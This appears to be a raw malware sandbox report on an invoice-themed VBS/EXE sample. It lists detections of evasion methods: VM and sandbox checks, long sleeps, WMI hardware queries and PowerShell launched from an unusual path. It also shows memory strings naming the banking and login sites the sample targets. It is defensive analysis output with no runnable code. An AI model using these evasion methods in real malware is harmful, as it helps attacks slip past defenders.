Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR
Powershell is started from unusual location (likely to bypass HIPS)
Source: c:\users\user\appdata\roaming\osdescription.vbs.exe Key value queried: Powershell behavior
Source: c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exe Key value queried: Powershell behavior Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory allocated: 2F90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory allocated: 47D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory allocated: 8310000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 710000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2520000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2270000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory allocated: 42B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory allocated: 42B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory allocated: 7F80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1540000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2F50000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2D80000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Window / User API: threadDelayed 2695 Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Window / User API: threadDelayed 3455 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2844 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 5486 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Window / User API: threadDelayed 4439
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Window / User API: threadDelayed 1330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3965
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 5802
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe TID: 7916 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -31000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30850s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30735s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30610s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30485s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30360s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30235s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30112s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -37000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36891s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36766s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36657s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36532s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36407s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36297s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36176s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35963s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35859s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35485s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35299s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35172s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35047s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34938s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34813s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34703s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34593s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34485s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34375s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34266s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7948 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe TID: 2120 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -32000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31450s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31331s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31216s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31107s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30982s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30515s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30406s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30297s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30187s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30078s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30850 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30735 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30610 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30360 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30235 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30112 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 37000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36891 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36766 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36657 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36532 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36407 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36297 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36176 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35963 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35859 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35299 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35172 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35047 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34938 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34813 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34703 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34593 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34485 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34266 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31331
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31107
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30982
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30078
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer Jump to behavior
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: InstallUtil.exe, 00000009.00000002.1450013749.000000000082F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: InstallUtil.exe, 00000011.00000002.1613446812.0000000001281000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
